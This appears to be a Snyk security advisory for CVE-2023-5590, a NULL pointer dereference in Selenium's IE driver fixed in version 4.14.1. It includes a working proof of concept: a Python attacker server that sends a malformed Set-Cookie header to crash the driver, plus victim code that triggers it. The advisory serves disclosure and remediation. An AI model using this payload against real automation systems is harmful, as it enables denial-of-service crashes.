NULL Pointer Dereference Affecting org.seleniumhq.selenium:selenium-ie-driver package, versions [,4.14.1)
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGSELENIUMHQSELENIUM-6062318
- published 16 Nov 2023
- disclosed 15 Oct 2023
- credit coolkingcole
Introduced: 15 Oct 2023
CVE-2023-5590 Open this link in a new tabHow to fix?
Upgrade org.seleniumhq.selenium:selenium-ie-driver
to version 4.14.1 or higher.
Overview
Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check on CookieWndProc
function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.
PoC
Attacker Server Code
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta
class CustomHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Send response status code
self.send_response(200)
# Send headers
self.send_header('Content-type', 'text/html')
# Set the cookie expiration to one day in the future
expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
self.send_header('Set-Cookie', well_formed_cookie)
malicious_cookie = f"cookie_name2" #crash
self.send_header('Set-Cookie', malicious_cookie)
self.end_headers()
# Send message back to client
message = "Hello world!"
self.wfile.write(bytes(message, "utf8"))
return
def run():
print('Starting server...')
server_address = ('127.0.0.1', 8090)
httpd = HTTPServer(server_address, CustomHTTPRequestHandler)
print('Server is running...')
httpd.serve_forever()
run()
Example Victim Code
from selenium import webdriver
import logging
import time
handler = logging.FileHandler("sel.log")
logger = logging.getLogger('selenium')
logging.basicConfig(level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
options = webdriver.IeOptions()
options.ignore_zoom_level = True
options.ignore_protected_mode_settings = True
options.attach_to_edge_chrome = True
options.initial_browser_url = 'https://selenium.dev'
service = webdriver.IeService(log_file="ie.log", log_level='DEBUG')
driver = webdriver.Ie(options=options,service=service)
driver.set_page_load_timeout(20)
print("Getting the page: ")
try:
driver.get("http://127.0.0.1:8090/")
except Exception as e:
print(e)
print("Got the page!")
print("Get Cookies: ")
cookies = driver.get_cookies()
print(cookies)
time.sleep(3)
driver.quit()